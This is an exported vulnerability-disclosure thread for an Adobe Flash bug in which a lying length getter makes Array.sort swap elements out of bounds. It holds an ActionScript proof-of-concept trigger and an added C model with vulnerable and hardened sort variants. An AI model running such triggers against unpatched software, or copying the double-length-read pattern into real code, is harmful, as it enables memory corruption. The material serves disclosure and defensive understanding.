AN-Master / google-security-research

Automatically exported from code.google.com/p/google-security-research

Adobe Flash: Array.sort can go out of bounds #374

Closed GoogleCodeExporter closed 8 years ago

GoogleCodeExporter commented 8 years ago
If the length of an array is overridden so that it returns a long length, and 
then later a short one, Array.sort can swap array elements that are out of 
bounds of the array in memory.

A PoC is as follows:

var s = 1;

// Three real elements; the array's backing storage holds only these.
var rec_array:Array = new Array();
rec_array.push({name: "john", city: "omaha", zip: 68144});
rec_array.push({name: "john", city: "kansas city", zip: 72345});
rec_array.push({name: "bob", city: "omaha", zip: 94010});

// Override length with an object whose valueOf runs script on every read,
// so successive reads of the length can disagree.
var n = {valueOf : gl};
rec_array.length = n;

// sortOn reads the lying length while sorting; its swaps then reach past
// the three real elements.
rec_array.sortOn(["name", "city"]);
for (var i = 0; i < rec_array.length; i++) {
    trace(rec_array[i].name + ", " + rec_array[i].city);
}

// Length oracle: returns 100000 for the first two reads, then 3.
function gl() {
    trace(s);
    if (s < 3) {
        s++;
        return 100000;
    } else {
        return 3;
    }
}

A sample swf and fla are attached.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

Original issue reported on code.google.com by natashe...@google.com on 7 May 2015 at 8:57


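The pattern behind the report, modelled in C as an added example (this is not Flash Player code and not part of the report): a native sort whose loop bound comes from one read of a script-controlled length and whose dense storage is sized from a later read. The LyingLength oracle plays the role of gl(), answering a large value and then a small one. How many times the real engine reads the length before the discrepancy bites is not stated above, so the model is an assumption: it reads twice, the oracle switches after the first read, and it uses 16 and 3 in place of 100000 and 3 to keep the run short. Accesses past the backing store are counted rather than performed, so the program runs safely while still showing what the vulnerable path would have touched; the hardened variant snapshots the length once and clamps it to the real capacity.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Added model, not Flash Player code. A script-visible array whose "length"
 * is observed through a callback (the role of the valueOf hook the PoC
 * installs with rec_array.length = {valueOf: gl}); the elements themselves
 * live in a plain C backing store of known capacity. */
typedef struct {
    int    *data;                    /* dense backing store */
    size_t  capacity;                /* ints actually allocated */
    size_t (*length_cb)(void *ctx);  /* script-controlled length */
    void   *ctx;
} ScriptArray;

/* Lying length oracle: `big` for the first n_big reads, `small` afterwards,
 * the shape of gl() in the report (100000, 100000, then 3). */
typedef struct { size_t big, small; int n_big, calls; } LyingLength;

static size_t lying_length(void *p) {
    LyingLength *l = (LyingLength *)p;
    return ++l->calls <= l->n_big ? l->big : l->small;
}

/* Checked access: a real engine indexes the store directly; here an index at
 * or past capacity is counted in *oob instead of touching memory. */
static int load(const ScriptArray *a, size_t i, size_t *oob) {
    if (i >= a->capacity) { (*oob)++; return 0; }
    return a->data[i];
}
static void swap(ScriptArray *a, size_t i, size_t j, size_t *oob) {
    if (i >= a->capacity || j >= a->capacity) { (*oob)++; return; }
    int t = a->data[i]; a->data[i] = a->data[j]; a->data[j] = t;
}

/* Resize the dense store to exactly n ints, zero-filling any growth. */
static void resize_store(ScriptArray *a, size_t n) {
    a->data = realloc(a->data, (n ? n : 1) * sizeof(int));
    if (n > a->capacity)
        memset(a->data + a->capacity, 0, (n - a->capacity) * sizeof(int));
    a->capacity = n;
}

/* Insertion sort over the first n slots; returns how many accesses fell
 * outside the store. Shared by both variants so that only n differs. */
static size_t sort_n(ScriptArray *a, size_t n) {
    size_t oob = 0;
    for (size_t i = 1; i < n; i++)
        for (size_t j = i; j > 0 && load(a, j - 1, &oob) > load(a, j, &oob); j--)
            swap(a, j - 1, j, &oob);
    return oob;
}

/* Vulnerable pattern (generic model, not the actual AVM code path): the loop
 * bound is fixed by the first length read, the store is sized by a second
 * read made after script has run again, so a long-then-short oracle walks
 * the loop far past a store that has just been shrunk. */
static size_t sort_vuln(ScriptArray *a) {
    size_t n   = a->length_cb(a->ctx);  /* script says "big" */
    size_t cur = a->length_cb(a->ctx);  /* script now says "small" */
    resize_store(a, cur);
    return sort_n(a, n);
}

/* Hardened: read the script-visible length once, clamp it to what is really
 * allocated, and leave the store's size alone while sorting. */
static size_t sort_safe(ScriptArray *a) {
    size_t n = a->length_cb(a->ctx);
    if (n > a->capacity) n = a->capacity;
    return sort_n(a, n);
}

/* Constructed input: three elements, as the PoC pushes three records. */
static const int SAMPLE[3] = { 3, 1, 2 };
static ScriptArray make_array(const int *vals, size_t n, LyingLength *oracle) {
    ScriptArray a = { malloc(n * sizeof(int)), n, lying_length, oracle };
    memcpy(a.data, vals, n * sizeof(int));
    return a;
}

/* Out-of-bounds accesses the vulnerable sort attempts against the oracle. */
size_t demo_vuln_oob(void) {
    LyingLength o = { 16, 3, 1, 0 };   /* 16 then 3 instead of 100000 then 3 */
    ScriptArray a = make_array(SAMPLE, 3, &o);
    size_t oob = sort_vuln(&a);
    free(a.data);
    return oob;
}

/* 1 if the hardened sort stays in bounds and leaves {1, 2, 3}, else 0. */
int demo_safe_ok(void) {
    LyingLength o = { 16, 3, 1, 0 };
    ScriptArray a = make_array(SAMPLE, 3, &o);
    int ok = sort_safe(&a) == 0 && a.data[0] == 1 && a.data[1] == 2 && a.data[2] == 3;
    free(a.data);
    return ok;
}

int main(void) {
    printf("vulnerable: %zu out-of-bounds accesses\n", demo_vuln_oob());
    printf("hardened:   %s\n", demo_safe_ok() ? "in bounds, sorted" : "FAILED");
    return 0;
}
```

The fix is not "validate the length harder" but "stop asking twice": every bound the native routine uses must derive from a single value captured before script can run, and that value must be reconciled with the real allocation, not with what the script claims.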
GoogleCodeExporter commented 8 years ago
This is PSIRT-3659

Original comment by natashe...@google.com on 8 May 2015 at 6:43

GoogleCodeExporter commented 8 years ago

Original comment by cev...@google.com on 5 Jul 2015 at 6:32

GoogleCodeExporter commented 8 years ago
Fixed: https://helpx.adobe.com/security/products/flash-player/apsb15-16.html

Original comment by cev...@google.com on 9 Jul 2015 at 12:37

GoogleCodeExporter commented 8 years ago

Original comment by natashe...@google.com on 3 Aug 2015 at 9:43